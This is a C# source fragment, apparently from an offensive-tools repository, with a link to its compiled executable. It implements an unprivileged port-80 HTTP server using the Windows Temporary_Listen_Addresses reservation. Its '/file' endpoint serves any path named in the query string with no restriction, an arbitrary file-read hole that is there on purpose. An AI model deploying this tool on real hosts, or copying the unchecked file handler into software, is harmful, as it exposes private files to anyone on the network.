				catch (Exception e)
				{
					Console.WriteLine("ERROR: " + e.Message);
				}
			}

			// [HttpGet('/file?{filename}')]
			if ((req.HttpMethod == "GET") && (req.Url.AbsolutePath.EndsWith("/file") == true) && (req.QueryString != null) && (req.QueryString.Count > 0))
			{
				// First query-string value, URL-decoded, is the path to read.
				string filename =
					Uri.UnescapeDataString(req.QueryString[0]);
				if (string.IsNullOrEmpty(filename))
				{
					// Returns without reaching the OutputStream.Close() at the end.
					return;
				}

				Console.WriteLine("Loading file: " + filename);
				filename = Path.Combine(filename);

				HttpStatusCode statusCode;
				if (File.Exists(filename))
				{
					try
					{
						using (var stream = new FileStream(filename, FileMode.Open, FileAccess.Read, FileShare.Read))
						{
							context.Response.ContentType = "application/octet-stream";
							context.Response.Headers.Add("Content-Disposition", "attachment; filename = " + Path.GetFileName(filename).ToString() + "");
							context.Response.ContentLength64 = stream.Length;

							stream.CopyTo(context.Response.OutputStream);
							stream.Flush();
							context.Response.OutputStream.Flush();
						}
						statusCode = HttpStatusCode.OK;
					}
					catch (Exception e)
					{
						Console.WriteLine("ERROR: " + e.Message);
						statusCode = HttpStatusCode.InternalServerError;
					}
				}
				else
				{
					Console.WriteLine("File not found: " + filename);
					statusCode = HttpStatusCode.NotFound;
				}

				// Status code and the two date headers are assigned after the body copy
				// above has already been written to the output stream.
				context.Response.StatusCode = (int)statusCode;
				if (statusCode == HttpStatusCode.OK)
				{
					context.Response.AddHeader("Date", DateTime.Now.ToString("r"));
					context.Response.AddHeader("Last-Modified", File.GetLastWriteTime(filename).ToString("r"));
				}
			}


			// Closes the response stream for every request that reaches this point.
			context.Response.OutputStream.Close();
		}


		// Entry point: builds a URI path of "/Temporary_Listen_Addresses/" plus the
		// first 8 hex characters of a new GUID, starts the server on "+" port 80,
		// prints the path and port, then calls Stop(), which joins the listener thread
		// and exits the process.
		public static void Main(string[] args)
		{
			string uripath = @"/Temporary_Listen_Addresses/" + Guid.NewGuid().ToString("n").Substring(0, 8) + "/";
			HTTPServer myServer;
			myServer = new HTTPServer("+", 80, uripath);
			myServer.Start();
			Console.WriteLine("\nServer started with the following parameters: " +
				"\nURI path with the Status and How-To: " + uripath.ToString() + "status" +
				"\nPORT: " + myServer.port.ToString());


			myServer.Stop();
			return;
		}
	}
}

--------------------------------------------------------------------------------
/unpriv-http-tcp80/unpriv-http-tcp80-v0.3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/post-cyberlabs/Offensive_tools/44a63480a215be5730c6ec36dcfda4e440226de9/unpriv-http-tcp80/unpriv-http-tcp80-v0.3.exe
--------------------------------------------------------------------------------